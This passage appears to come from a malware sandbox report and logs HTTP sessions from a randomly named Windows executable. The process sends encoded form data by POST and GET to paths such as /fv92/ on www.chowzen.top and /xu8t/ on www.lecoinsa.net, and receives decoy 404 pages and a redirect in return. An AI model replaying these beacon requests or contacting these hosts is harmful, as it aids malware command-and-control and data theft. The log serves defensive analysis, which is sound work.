Jun 13, 2024 11:05:59.218446016 CEST	1236	IN	Data Raw: 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 Data Ascii: l="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620"
Jun 13, 2024 11:05:59.223573923 CEST	1236	IN	Data Raw: 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 Data Ascii: 221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-line

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49746	162.0.213.72	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:01.088593006 CEST	1743	OUT	POST /fv92/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.chowzen.top Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.chowzen.top Referer: http://www.chowzen.top/fv92/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 2f 4b 54 4f 63 49 52 78 33 35 38 53 32 31 6b 5a 34 52 4c 30 38 47 6b 31 31 65 79 36 72 54 37 49 6f 6a 70 55 30 57 2f 4b 36 50 38 64 67 51 6b 6f 78 43 2b 49 65 63 32 4f 7a 4d 65 75 55 2f 4e 55 69 38 70 4f 6c 5a 64 63 72 4d 72 51 6c 42 6b 54 4a 72 4b 36 30 31 7a 37 79 2b 5a 41 54 45 43 43 6a 33 4b 4e 64 58 4d 50 31 36 55 32 32 6c 64 36 58 5a 61 33 6f 55 32 45 6b 4d 51 38 69 43 2b 4d 46 33 6a 4c 57 50 68 52 79 69 66 4a 4e 41 52 57 79 39 79 33 73 72 41 54 67 67 41 71 48 79 66 54 48 75 44 31 42 6c 75 56 50 6c 57 49 42 51 68 72 2b 5a 64 76 41 35 6c 4b 62 71 37 46 7a 38 35 30 37 61 55 4d 55 42 54 79 2b 63 44 68 51 6d 34 72 51 6a 78 36 6a 38 6e 43 47 39 43 68 4e 42 42 4e 65 74 6b 35 4a 51 4b 4b 62 45 35 77 50 4b 45 72 76 34 30 48 56 54 6f 55 35 2b 46 6b 53 61 76 31 38 2b 2b 4e 74 4d 4f 45 44 71 67 47 57 50 58 68 67 44 6b 30 79 4b 4c 57 50 34 74 74 56 50 79 32 45 41 69 54 45 49 69 49 50 48 55 4d 31 69 2b 5a 46 44 73 45 66 46 37 65 65 67 68 58 51 45 4c 39 32 6b 39 55 7a 65 59 32 4d 78 57 66 71 77 31 [TRUNCATED] Data Ascii: fD=/KTOcIRx358S21kZ4RL08Gk11ey6rT7IojpU0W/K6P8dgQkoxC+Iec2OzMeuU/NUi8pOlZdcrMrQlBkTJrK601z7y+ZATECCj3KNdXMP16U22ld6XZa3oU2EkMQ8iC+MF3jLWPhRyifJNARWy9y3srATggAqHyfTHuD1BluVPlWIBQhr+ZdvA5lKbq7Fz8507aUMUBTy+cDhQm4rQjx6j8nCG9ChNBBNetk5JQKKbE5wPKErv40HVToU5+FkSav18++NtMOEDqgGWPXhgDk0yKLWP4ttVPy2EAiTEIiIPHUM1i+ZFDsEfF7eeghXQEL92k9UzeY2MxWfqw12qcCNgCnmy7UIlOamAKVPTBwx0c0dNWcldzT1vy7CAuPOQzCX1oel2qWaF2hk9ggEhqPuiGtcB7TjgMiSCBH6vjMIfq5TWeBYll+fXETVb7tnhb2vUh3+qBHq1m2g8m/Xx/YsePD6zlzIVdw9fB3OKWHkLeWmsYVmTjForOUUFQHvGHwtazuIwi+w7UlpsPe2RXXmPligJXvP8eQ6B6xhKJgRHyvC2zpwujy62nlGXPu782XDJ2vVRnfLgQaX5tcRCC85py8kPIiInNWE1j0jfIg2GnJMfYYFuJXibNbe8AyFCCmc8O7vJHmTPGAW7kb/l2eCr6htfpfm5i3sF7PJnFqgov51Om5f0XA0HbaS+lLo8QBmSAstc5Y3C2VMvRDOaMqb2lucbSSwXbAwUuDXsaAwuHPx93DQYKAuPT0+lLdh3tMzZx+7wHlYsskaFdEwristjBpGdt/aBtzwmbWdQKbIBcYyfp6LVyUfLjJ3+55IseNg3QWPrqaqodUN2UcotozwUsOjuHL/P0KoE9TwFdPu0Cemz4icy5Xtts6nR/bCrDBCdw85CqCE9VFEIQgvhJ0NNqBPuOZIBSOfuzMGf7vQSUiW2r42nfDH82VG4WrEx4zQsXk03RqM3vMyxE6OkoBA7V5x7BEq9AYrRyHbd4Afe0PxOba8O [TRUNCATED]
Jun 13, 2024 11:06:01.771080017 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:06:01 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Jun 13, 2024 11:06:01.771126032 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Jun 13, 2024 11:06:01.771162033 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Jun 13, 2024 11:06:01.771194935 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Jun 13, 2024 11:06:01.771231890 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Jun 13, 2024 11:06:01.771265030 CEST	1236	IN	Data Raw: 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 Data Ascii: 719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1="406.967" x2="1
Jun 13, 2024 11:06:01.771300077 CEST	1236	IN	Data Raw: 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 35 30 2e 30 36 36 22 20 63 79 3d 22 33 32 30 2e 32 35 39 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: rlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="168.303" cy="353.753" r="7.952" />
Jun 13, 2024 11:06:01.771330118 CEST	36	IN	Data Raw: 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: .651" /> <circle fil
Jun 13, 2024 11:06:01.771363020 CEST	1236	IN	Data Raw: 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 Data Ascii: l="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620"
Jun 13, 2024 11:06:01.771399021 CEST	1236	IN	Data Raw: 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 Data Ascii: 221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-line
Jun 13, 2024 11:06:01.776411057 CEST	1236	IN	Data Raw: 31 37 2e 33 33 2d 35 2e 37 36 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d Data Ascii: 17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49747	162.0.213.72	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:03.618855000 CEST	450	OUT	GET /fv92/?fD=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.chowzen.top Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:06:04.292340040 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:06:04 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Jun 13, 2024 11:06:04.292406082 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
Jun 13, 2024 11:06:04.292443037 CEST	1236	IN	Data Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
Jun 13, 2024 11:06:04.292478085 CEST	1236	IN	Data Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
Jun 13, 2024 11:06:04.292538881 CEST	848	IN	Data Raw: 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c Data Ascii: 386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /
Jun 13, 2024 11:06:04.292573929 CEST	1236	IN	Data Raw: 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c Data Ascii: "295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898"
Jun 13, 2024 11:06:04.292613983 CEST	212	IN	Data Raw: 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 84.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="r
Jun 13, 2024 11:06:04.292645931 CEST	1236	IN	Data Raw: 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 35 38 38 2e 39 37 37 22 20 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 Data Ascii: ound" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.2
Jun 13, 2024 11:06:04.292679071 CEST	212	IN	Data Raw: 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 31 33 2e 36 31 38 22 20 63 79 3d 22 34 38 32 2e 33 38 37 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: imit="10" cx="413.618" cy="482.387" r="7.952" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" />
Jun 13, 2024 11:06:04.292716026 CEST	1236	IN	Data Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 Data Ascii: <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle
Jun 13, 2024 11:06:04.297672033 CEST	1236	IN	Data Raw: 33 2e 31 31 2c 33 33 2e 33 30 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 Data Ascii: 3.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49748	217.116.0.191	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:06:09.518826962 CEST	709	OUT	POST /xu8t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.lecoinsa.net Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lecoinsa.net Referer: http://www.lecoinsa.net/xu8t/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 6c 4a 72 4a 42 57 54 6b 36 30 4d 42 49 2f 38 56 55 49 6b 44 37 33 50 69 39 62 71 6d 78 34 4e 79 50 6c 37 4c 4a 38 4a 64 57 34 42 38 55 6a 56 5a 4a 44 33 38 46 6a 4b 56 30 63 71 6f 4b 4f 64 33 65 43 71 71 39 6e 64 62 36 43 41 39 74 5a 43 48 77 44 4e 34 4e 76 64 58 32 59 41 41 30 72 46 6c 53 34 52 35 66 78 46 66 31 4f 4e 56 35 66 52 50 59 51 30 78 71 6c 62 49 2f 6a 45 47 33 50 4d 78 77 4a 6a 47 43 6b 37 6d 35 69 69 42 38 72 4f 6a 6a 32 4f 42 2f 44 34 51 66 70 38 2f 6c 34 61 34 74 71 39 52 34 42 51 7a 75 75 74 77 48 71 73 70 32 63 32 72 66 6b 67 66 33 33 45 54 76 52 44 37 7a 38 73 6e 79 66 38 3d Data Ascii: fD=lJrJBWTk60MBI/8VUIkD73Pi9bqmx4NyPl7LJ8JdW4B8UjVZJD38FjKV0cqoKOd3eCqq9ndb6CA9tZCHwDN4NvdX2YAA0rFlS4R5fxFf1ONV5fRPYQ0xqlbI/jEG3PMxwJjGCk7m5iiB8rOjj2OB/D4Qfp8/l4a4tq9R4BQzuutwHqsp2c2rfkgf33ETvRD7z8snyf8=
Jun 13, 2024 11:06:10.406095028 CEST	598	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 13 Jun 2024 09:06:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://lecoinsa.net/xu8t/ Origin-Agent-Cluster: ?0 Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 78 75 38 74 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED] Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/xu8t/'" /> <title>Redirecting to http://lecoinsa.net/xu8t/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/xu8t/">http://lecoinsa.net/xu8t/</a>. </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49749	217.116.0.191	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
